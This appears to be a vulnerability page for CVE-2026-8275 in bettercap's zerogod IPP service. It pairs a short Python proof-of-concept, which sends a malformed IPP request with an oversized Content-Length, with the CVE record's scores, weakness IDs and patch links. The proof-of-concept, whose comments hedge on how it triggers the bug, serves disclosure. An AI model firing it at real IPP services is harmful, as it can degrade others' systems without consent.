CVE-2026-8275

import socket def exploit_ipp_coercion(target_ip, target_port): """ PoC for CVE-2026-8275: Integer Coercion in bettercap zerogod IPP Service. Sends a malformed IPP packet to trigger the integer coercion error. """ try: # Create a socket connection to the target IPP service s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Construct a malicious IPP request # The vulnerability lies in ippReadChunkedBody handling chunk sizes. # We simulate a large chunk size to trigger coercion/truncation. payload = b"POST /ipp HTTP/1.1\r\n" payload += b"Content-Type: application/ipp\r\n" payload += b"Host: target\r\n" # Triggering the coercion logic with a crafted chunk size # Assuming the parser expects a specific integer type malicious_chunk_size = 0xFFFFFFFF # Max 32-bit int payload += f"Content-Length: {malicious_chunk_size}\r\n".encode() payload += b"\r\n" payload += b"\x01\x00" + b"\x00" * 10 # Minimal IPP header s.sendall(payload) print("[+] Payload sent to target.") response = s.recv(1024) print("[+] Response received:", response) s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and Port exploit_ipp_coercion("127.0.0.1", 631)

{"cve": {"id": "CVE-2026-8275", "sourceIdentifier": "[email protected]", "published": "2026-05-11T06:16:09.840", "lastModified": "2026-05-11T06:16:09.840", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in bettercap up to 2.41.5. Affected by this vulnerability is the function ippReadChunkedBody of the file modules/zerogod/zerogod_ipp_primitives.go of the component zerogod IPP Service. Performing a manipulation results in integer coercion error. The attack can be initiated remotely. The attack is considered to have high complexity. The exploitation appears to be difficult. The exploit is now public and may be used. The patch is named 3731d5576cffae9eefe3721cd46a40933304129f. To fix this issue, it is recommended to deploy a patch."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:N/I:N/A:P", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-189"}, {"lang": "en", "value": "CWE-192"}]}], "references": [{"url": "https://github.com/bettercap/bettercap/", "source": "[email protected]"}, {"url": "https://github.com/bettercap/bettercap/commit/3731d5576cffae9eefe3721cd46a40933304129f", "source": "[email protected]"}, {"url": "https://github.com/bettercap/bettercap/issues/1263", "source": "[email protected]"}, {"url": "https://github.com/bettercap/bettercap/pull/1264", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/26852847/poc.py", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811145", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362572", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362572/cti", "source": "[email protected]"}]}}